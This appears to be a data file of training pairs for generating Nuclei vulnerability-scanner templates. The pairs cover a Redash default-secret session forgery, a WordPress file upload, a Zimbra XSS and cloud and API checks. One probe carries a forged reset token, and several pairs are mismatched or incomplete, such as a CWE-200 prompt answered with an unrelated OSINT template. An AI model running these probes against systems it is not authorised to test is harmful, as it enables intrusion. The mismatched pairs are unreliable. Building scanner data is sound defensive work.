"affected_products": [
{
"vendor": "redash",
"product": "redash",
"version_range": "<= 10.0.0"
}
],
"paths": [],
"indicators": [
"error",
"vulnerability detected"
],
"severity_hint": "high"
}
[RETRIEVED_TEMPLATES]
[
{
"id": "cve-2023-2986",
"severity": "critical",
"tags": [
"cve",
"cve2023",
"wordpress",
"woocommerce",
"wp-plugin",
"auth-bypass",
"woocommerce-abandoned-cart",
"vkev",
"vuln"
],
"requests": [
{
"method": "GET",
"paths": [
"{{BaseURL}}/?wcal_action=checkout_link&user_email=test&validate={{replace_regex(code_response,'(.*:)','')}}"
],
"matcher_types": [
"status"
]
},
{
"method": "GET",
"paths": [
"{{BaseURL}}/?wcal_action=checkout_link&user_email=test&validate={{replace_regex(code_response,'(:.*)','')}}"
],
"matcher_types": [
"word",
"word",
"status"
]
}
]
},
{
"id": "cve-2014-0160",
"severity": "high",
"tags": [
"cve",
"cve2014",
"openssl",
"heartbleed",
"code",
"kev",
"vkev",
"vuln"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "cve-2022-42475",
"severity": "critical",
"tags": [
"cve",
"cve2024",
"ssl-vpn",
"vpn",
"fortios",
"fortigate",
"heap-based",
"bufferoverflow",
"kev",
"vkev",
"vuln"
],
"requests": [
{
"method": "GET",
"paths": [
"{{BaseURL}}/remote/login",
"{{BaseURL}}/login"
],
"matcher_types": [
"dsl"
]
}
]
}
]
[POC_SNIPPETS]
[
{
"source": "nvd",
"url": "https://github.com/getredash/redash/commit/ce60d20c4e3d1537581f2f70f1308fe77ab6a214",
"snippet": "PoC available at https://github.com/getredash/redash/commit/ce60d20c4e3d1537581f2f70f1308fe77ab6a214"
},
{
"source": "nvd",
"url": "https://github.com/getredash/redash/security/advisories/GHSA-g8xr-f424-h2rv",
"snippet": "PoC available at https://github.com/getredash/redash/security/advisories/GHSA-g8xr-f424-h2rv"
},
{
"source": "nvd",
"url": "https://ian.sh/redash",
"snippet": "PoC available at https://ian.sh/redash"
},
{
"source": "nvd",
"url": "https://github.com/getredash/redash/commit/ce60d20c4e3d1537581f2f70f1308fe77ab6a214",
"snippet": "PoC available at https://github.com/getredash/redash/commit/ce60d20c4e3d1537581f2f70f1308fe77ab6a214"
},
{
"source": "nvd",
"url": "https://github.com/getredash/redash/security/advisories/GHSA-g8xr-f424-h2rv",
"snippet": "PoC available at https://github.com/getredash/redash/security/advisories/GHSA-g8xr-f424-h2rv"
}
]
[INSTRUCTION]
Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
|
{
"id": "cve-2021-41192",
"info": {
"name": "Redash Setup Configuration - Default Secrets Disclosure",
"author": "bananabr",
"severity": "medium",
"description": "Redash Setup Configuration is vulnerable to default secrets disclosure (Insecure Default Initialization of Resource). If an admin sets up Redash versions <=10.0 and prior without explicitly specifying the `REDASH_COOKIE_SECRET` or `REDASH_SECRET_KEY` environment variables, a default value is used for both that is the same across all installations. In such cases, the instance is vulnerable to attackers being able to forge sessions using the known default value.",
"tags": [
"cve2021",
"cve",
"hackerone",
"redash",
"auth-bypass",
"vuln"
],
"reference": [
"https://hackerone.com/reports/1380121",
"https://github.com/getredash/redash/security/advisories/GHSA-g8xr-f424-h2rv",
"https://nvd.nist.gov/vuln/detail/CVE-2021-41192",
"https://github.com/getredash/redash/commit/ce60d20c4e3d1537581f2f70f1308fe77ab6a214",
"https://github.com/ARPSyndicate/cvemon"
]
},
"requests": [
{
"method": "GET",
"path": [
"{{BaseURL}}/reset/IjEi.YhAmmQ.cdQp7CnnVq02aQ05y8tSBddl-qs",
"{{BaseURL}}/redash/reset/IjEi.YhAmmQ.cdQp7CnnVq02aQ05y8tSBddl-qs"
],
"matchers": [
{
"type": "word",
"part": "body",
"words": [
"Enter your new password:",
"redash"
],
"condition": "and"
},
{
"type": "status",
"status": [
200
]
}
],
"matchers_condition": "and",
"stop_at_first_match": true
}
],
"safety_flags": {
"static_validation_passed": false,
"denylist_checked": false,
"regex_safe": false
},
"limits": {
"max_requests": 1,
"max_body_size": 10240,
"timeout": 10
},
"metadata": {
"generated_by": "ernest-parser",
"model_version": "manual-parse-v1.0",
"generation_mode": "generate",
"input_canonical_id": "parsed-CVE-2021-41192",
"timestamp": "2025-11-13T15:15:43.492121Z"
}
}
|
gcloud-gke-integrity-monitoring-disabled
|
[CANONICAL_RECORD]
{
"cve_id": "gcloud-gke-integrity-monitoring-disabled",
"summary": "Ensure that Integrity Monitoring is enabled for your Google Kubernetes Engine (GKE) cluster nodes to monitor and automatically check the runtime boot integrity using Google Cloud Monitoring service. This feature helps verify that the boot loader and other measured components remain untampered.\n",
"affected_products": [],
"paths": [],
"indicators": [
"GKE Node Pools Without Integrity Monitoring",
"detected"
],
"severity_hint": "medium"
}
[RETRIEVED_TEMPLATES]
[
{
"id": "multi-region-logging-disabled",
"severity": "high",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"alibaba-cloud-config",
"actiontrail"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "public-actiontrail-bucket",
"severity": "high",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"aliyun-cloud-config",
"actiontrail"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "ack-cluster-cloud-monitor-disable",
"severity": "medium",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"aliyun-cloud-config",
"ack"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
}
]
[POC_SNIPPETS]
[]
[INSTRUCTION]
Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
|
{
"id": "gcloud-gke-integrity-monitoring-disabled",
"info": {
"name": "GKE Node Pools Without Integrity Monitoring",
"author": "princechaddha",
"severity": "medium",
"description": "Ensure that Integrity Monitoring is enabled for your Google Kubernetes Engine (GKE) cluster nodes to monitor and automatically check the runtime boot integrity using Google Cloud Monitoring service. This feature helps verify that the boot loader and other measured components remain untampered.\n",
"tags": [
"cloud",
"devops",
"gcp",
"gcloud",
"gke",
"kubernetes",
"security",
"monitoring",
"gcp-cloud-config"
],
"reference": [
"https://cloud.google.com/kubernetes-engine/docs/how-to/shielded-gke-nodes",
"https://www.trendmicro.com/cloudoneconformity/knowledge-base/gcp/GKE/enable-integrity-monitoring.html"
]
},
"requests": [
{
"method": "GET",
"path": [
"/"
],
"matchers": [
{
"type": "status",
"status": [
200
]
}
]
}
],
"safety_flags": {
"static_validation_passed": false,
"denylist_checked": false,
"regex_safe": false
},
"limits": {
"max_requests": 1,
"max_body_size": 10240,
"timeout": 10
},
"metadata": {
"generated_by": "ernest-parser",
"model_version": "manual-parse-v1.0",
"generation_mode": "generate",
"input_canonical_id": "parsed-gcloud-gke-integrity-monitoring-disabled",
"timestamp": "2025-11-13T15:15:38.436400Z"
}
}
|
CVE-2022-1574
|
[CANONICAL_RECORD]
{
"cve_id": "CVE-2022-1574",
"summary": "The HTML2WP WordPress plugin through 1.0.0 does not have authorisation and CSRF checks when importing files, and does not validate them, as a result, unauthenticated attackers can upload arbitrary files (such as PHP) on the remote server",
"affected_products": [
{
"vendor": "html2wp_project",
"product": "html2wp",
"version_range": "<= 1.0.0"
}
],
"paths": [],
"indicators": [
"error",
"vulnerability detected"
],
"severity_hint": "critical"
}
[RETRIEVED_TEMPLATES]
[
{
"id": "cve-2022-42475",
"severity": "critical",
"tags": [
"cve",
"cve2024",
"ssl-vpn",
"vpn",
"fortios",
"fortigate",
"heap-based",
"bufferoverflow",
"kev",
"vkev",
"vuln"
],
"requests": [
{
"method": "GET",
"paths": [
"{{BaseURL}}/remote/login",
"{{BaseURL}}/login"
],
"matcher_types": [
"dsl"
]
}
]
},
{
"id": "cve-2023-2986",
"severity": "critical",
"tags": [
"cve",
"cve2023",
"wordpress",
"woocommerce",
"wp-plugin",
"auth-bypass",
"woocommerce-abandoned-cart",
"vkev",
"vuln"
],
"requests": [
{
"method": "GET",
"paths": [
"{{BaseURL}}/?wcal_action=checkout_link&user_email=test&validate={{replace_regex(code_response,'(.*:)','')}}"
],
"matcher_types": [
"status"
]
},
{
"method": "GET",
"paths": [
"{{BaseURL}}/?wcal_action=checkout_link&user_email=test&validate={{replace_regex(code_response,'(:.*)','')}}"
],
"matcher_types": [
"word",
"word",
"status"
]
}
]
},
{
"id": "cve-2020-0646",
"severity": "critical",
"tags": [
"cve",
"cve2020",
"net-framework",
"sharepoint",
"microsoft",
"packetstorm",
"rce",
"kev",
"oast",
"vkev",
"vuln"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
}
]
[POC_SNIPPETS]
[
{
"source": "nvd",
"url": "https://wpscan.com/vulnerability/c36d0ea8-bf5c-4af9-bd3d-911eb02adc14",
"snippet": "PoC available at https://wpscan.com/vulnerability/c36d0ea8-bf5c-4af9-bd3d-911eb02adc14"
},
{
"source": "nvd",
"url": "https://wpscan.com/vulnerability/c36d0ea8-bf5c-4af9-bd3d-911eb02adc14",
"snippet": "PoC available at https://wpscan.com/vulnerability/c36d0ea8-bf5c-4af9-bd3d-911eb02adc14"
}
]
[INSTRUCTION]
Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
|
{
"id": "cve-2022-1574",
"info": {
"name": "WordPress HTML2WP <=1.0.0 - Arbitrary File Upload",
"author": "theamanrawat",
"severity": "critical",
"description": "WordPress HTML2WP plugin through 1.0.0 contains an arbitrary file upload vulnerability. The plugin does not perform authorization and CSRF checks when importing files and does not validate them. As a result, an attacker can upload arbitrary files on the remote server.\n",
"tags": [
"cve",
"cve2022",
"wp-plugin",
"wp",
"fileupload",
"unauth",
"wpscan",
"wordpress",
"intrusive",
"html2wp",
"html2wp_project",
"vuln"
],
"reference": [
"https://wpscan.com/vulnerability/c36d0ea8-bf5c-4af9-bd3d-911eb02adc14",
"https://wordpress.org/plugins/html2wp/",
"https://nvd.nist.gov/vuln/detail/CVE-2022-1574",
"https://github.com/ARPSyndicate/kenzer-templates"
]
},
"requests": [
{
"method": "GET",
"path": [],
"matchers": [
{
"type": "dsl",
"dsl": [
"status_code_1 == 302",
"status_code_2 == 200",
"contains(body_2, 'File Upload success')"
],
"condition": "and"
}
]
}
],
"safety_flags": {
"static_validation_passed": false,
"denylist_checked": false,
"regex_safe": false
},
"limits": {
"max_requests": 1,
"max_body_size": 10240,
"timeout": 10
},
"metadata": {
"generated_by": "ernest-parser",
"model_version": "manual-parse-v1.0",
"generation_mode": "generate",
"input_canonical_id": "parsed-CVE-2022-1574",
"timestamp": "2025-11-13T15:15:43.903903Z"
}
}
|
api-mywot
|
[CANONICAL_RECORD]
{
"cve_id": "api-mywot",
"summary": "IP/domain/URL reputation. This template detects My Web of Trust API by checking specific patterns and responses.",
"affected_products": [],
"paths": [],
"indicators": [
"\"target\":",
"\"safety\":"
],
"severity_hint": "info"
}
[RETRIEVED_TEMPLATES]
[
{
"id": "multi-region-logging-disabled",
"severity": "high",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"alibaba-cloud-config",
"actiontrail"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "public-actiontrail-bucket",
"severity": "high",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"aliyun-cloud-config",
"actiontrail"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "ack-cluster-api-public",
"severity": "high",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"aliyun-cloud-config",
"ack"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
}
]
[POC_SNIPPETS]
[]
[INSTRUCTION]
Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
|
{
"id": "api-mywot",
"info": {
"name": "My Web of Trust API",
"author": "daffainfo",
"severity": "info",
"description": "IP/domain/URL reputation",
"tags": [
"token-spray",
"weboftrust"
],
"reference": [
"https://support.mywot.com/hc/en-us/sections/360004477734-API-",
"https://github.com/daffainfo/all-about-apikey/tree/main/web-of-trust"
]
},
"requests": [
{
"method": "GET",
"path": [],
"matchers": [
{
"type": "word",
"part": "body",
"words": [
"\"target\":",
"\"safety\":"
],
"condition": "and"
}
]
}
],
"safety_flags": {
"static_validation_passed": false,
"denylist_checked": false,
"regex_safe": false
},
"limits": {
"max_requests": 1,
"max_body_size": 10240,
"timeout": 10
},
"metadata": {
"generated_by": "ernest-parser",
"model_version": "manual-parse-v1.0",
"generation_mode": "generate",
"input_canonical_id": "parsed-api-mywot",
"timestamp": "2025-11-13T15:16:06.613636Z"
}
}
|
CVE-2022-24682
|
[CANONICAL_RECORD]
{
"cve_id": "CVE-2022-24682",
"summary": "An issue was discovered in the Calendar feature in Zimbra Collaboration Suite 8.8.x before 8.8.15 patch 30 (update 1), as exploited in the wild starting in December 2021. An attacker could place HTML containing executable JavaScript inside element attributes. This markup becomes unescaped, causing arbitrary markup to be injected into the document.",
"affected_products": [
{
"vendor": "synacor",
"product": "zimbra_collaboration_suite",
"version_range": ">= 8.8.0, < 8.8.15"
}
],
"paths": [],
"indicators": [
"error",
"vulnerability detected"
],
"severity_hint": "medium"
}
[RETRIEVED_TEMPLATES]
[
{
"id": "cve-2023-2640",
"severity": "high",
"tags": [
"cve",
"cve2023",
"code",
"packetstorm",
"kernel",
"ubuntu",
"linux",
"privesc",
"local",
"canonical",
"vkev",
"vuln"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "cve-2019-14287",
"severity": "high",
"tags": [
"packetstorm",
"cve",
"cve2019",
"sudo",
"code",
"linux",
"privesc",
"local",
"canonical",
"sudo_project",
"vuln"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "cve-2021-3156",
"severity": "high",
"tags": [
"packetstorm",
"cve",
"cve2021",
"sudo",
"code",
"linux",
"privesc",
"local",
"kev",
"sudo_project",
"vkev",
"vuln"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
}
]
[POC_SNIPPETS]
[
{
"source": "nvd",
"url": "https://www.volexity.com/blog/2022/02/03/operation-emailthief-active-exploitation-of-zero-day-xss-vulnerability-in-zimbra/",
"snippet": "PoC available at https://www.volexity.com/blog/2022/02/03/operation-emailthief-active-exploitation-of-zero-day-xss-vulnerability-in-zimbra/"
}
]
[INSTRUCTION]
Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
|
{
"id": "cve-2022-24682",
"info": {
"name": "Zimbra Collaboration Suite < 8.8.15 - Improper Encoding",
"author": "rxerium",
"severity": "medium",
"description": "An issue was discovered in the Calendar feature in Zimbra Collaboration Suite 8.8.x before 8.8.15 patch 30 (update 1), as exploited in the wild starting in December 2021. An attacker could place HTML containing executable JavaScript inside element attributes. This markup becomes unescaped, causing arbitrary markup to be injected into the document.\n",
"tags": [
"cve",
"cve2022",
"zimbra",
"collaboration",
"xss",
"kev",
"passive",
"vkev",
"vuln"
],
"reference": [
"https://nvd.nist.gov/vuln/detail/CVE-2022-24682",
"https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-228a"
]
},
"requests": [
{
"method": "GET",
"path": [
"{{BaseURL}}/js/zimbraMail/share/model/ZmSettings.js"
],
"matchers": [
{
"type": "word",
"part": "body",
"words": [
"Zimbra Collaboration Suite Web Client"
]
},
{
"type": "word",
"part": "content_type",
"words": [
"application/x-javascript"
]
},
{
"type": "dsl",
"dsl": [
"compare_versions(detected_version, '< 8.8.15')",
"compare_versions(detected_version, '> 8.7.15')"
],
"condition": "and"
}
],
"matchers_condition": "and"
}
],
"safety_flags": {
"static_validation_passed": false,
"denylist_checked": false,
"regex_safe": false
},
"limits": {
"max_requests": 1,
"max_body_size": 10240,
"timeout": 10
},
"metadata": {
"generated_by": "ernest-parser",
"model_version": "manual-parse-v1.0",
"generation_mode": "generate",
"input_canonical_id": "parsed-CVE-2022-24682",
"timestamp": "2025-11-13T15:15:44.081303Z"
}
}
|
CWE-200
|
[CANONICAL_RECORD]
{
"cve_id": "CWE-200",
"summary": "The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p",
"affected_products": [],
"paths": [],
"indicators": [
"error",
"unauthorized"
],
"severity_hint": "medium"
}
[RETRIEVED_TEMPLATES]
[
{
"id": "elasticbeanstalk-takeover",
"severity": "high",
"tags": [
"dns",
"takeover",
"aws",
"elasticbeanstalk",
"discovery"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "detect-dangling-cname",
"severity": "info",
"tags": [
"dns",
"takeover",
"discovery"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "dns-waf-detect",
"severity": "info",
"tags": [
"tech",
"waf",
"dns",
"discovery"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
}
]
[POC_SNIPPETS]
[]
[INSTRUCTION]
Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
|
{
"id": "gloriatv",
"info": {
"name": "Gloria.tv User Name Information - Detect",
"author": "dwisiswant0",
"severity": "info",
"description": "Gloria.tv user name information check was conducted.",
"tags": [
"osint",
"osint-social",
"gloriatv",
"discovery"
],
"reference": []
},
"requests": [
{
"method": "GET",
"path": [
"https://gloria.tv/{{user}}"
],
"matchers": [
{
"type": "status",
"status": [
200
]
},
{
"type": "word",
"part": "body",
"words": [
"Last online"
]
}
],
"matchers_condition": "and"
}
],
"safety_flags": {
"static_validation_passed": false,
"denylist_checked": false,
"regex_safe": false
},
"limits": {
"max_requests": 1,
"max_body_size": 10240,
"timeout": 10
},
"metadata": {
"generated_by": "ernest-parser",
"model_version": "manual-parse-v1.0",
"generation_mode": "generate",
"input_canonical_id": "parsed-gloriatv",
"timestamp": "2025-11-13T15:15:51.820060Z"
}
}
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.